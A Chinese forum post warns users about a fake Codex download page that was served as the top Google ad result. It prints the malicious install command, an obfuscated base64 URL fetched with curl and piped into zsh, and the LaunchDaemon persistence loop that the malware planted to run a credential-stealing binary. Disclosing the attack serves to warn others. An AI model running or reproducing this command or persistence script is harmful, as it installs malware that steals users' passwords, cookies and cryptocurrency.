rt ,这个也确实怪我大意了,不小心中招了,发个帖希望各位站友别犯错
今天用 cc 编码,minmax 模型实在是问题多,我就去 google 搜 codex 官网,下载 codex 试试的
搜索的第一个我就点击进去了(截止发帖时间,依然在第一个),我后面对比了下与 chatgpt 的页面一毛一样
然后我点击第一个链接进去后,按照页面提示点击安装按钮
安装命令我贴出来下
echo "Downloading Codex: https://chatgpt.com/codex-app/Codex.dmg" && curl -s $(echo "aHR0cHM6Ly9ncmVlbmFjdGl2LmNvbS9jdXJsLzRhZjU5ZjBmYTY3YjI5MDljOWQxMWFmM2UwMmE3OTE4MjcxMDhlMmQ1MjU5OGMyN2Y2Mjg2NmEwNDAzMDk2Mzc=" | openssl base64 -d -A) | zsh
这个脚本各种混淆,以及 echo 复杂。。翻译了好半天才找到位置
我的系统是mac ,m3,当前搜索的结果的第一个依然是有病毒的那个,链接地址是:https://sites.google.com/view/mcodxa05?gad_source=1&gad_campaignid=23830654967&gbraid=0AAAABCyPF1X_F5PgAUkSXPc81geK40xyU&gclid=Cj0KCQjw_IXQBhCkARIsADqELbIIIUvj_LG5kiLa0FV0sMTckIfL_HIk4W7aYRY-J-e1PJ3eLmYR86UaAo_iEALw_wcB
病毒的情况是:我安装后,提示我输入密码,我输入后在/Library/LaunchDaemons 中增加一个启动项,启动的内容是home目录下, /Users/xxx/Library/Application Support/.com.apple.accountsd/.service .service的内容在下面,每一秒启动一次AccountsHelper,AccountsHelper是一个二进制程序看不到内容,gemini 给分析是在不断获取cookies 、账号密码加密货币等信息
while true; do
osascript <<EOF
set loginContent to do shell script "stat -f \"%Su\" /dev/console"
if loginContent is not equal to "" and loginContent is not equal to "root"
do shell script "sudo -u " & quoted form of loginContent & " '/Users/zrc/Library/Application Support/.com.apple.accountsd/AccountsHelper'"
end if
EOF
sleep 1
done
Select Language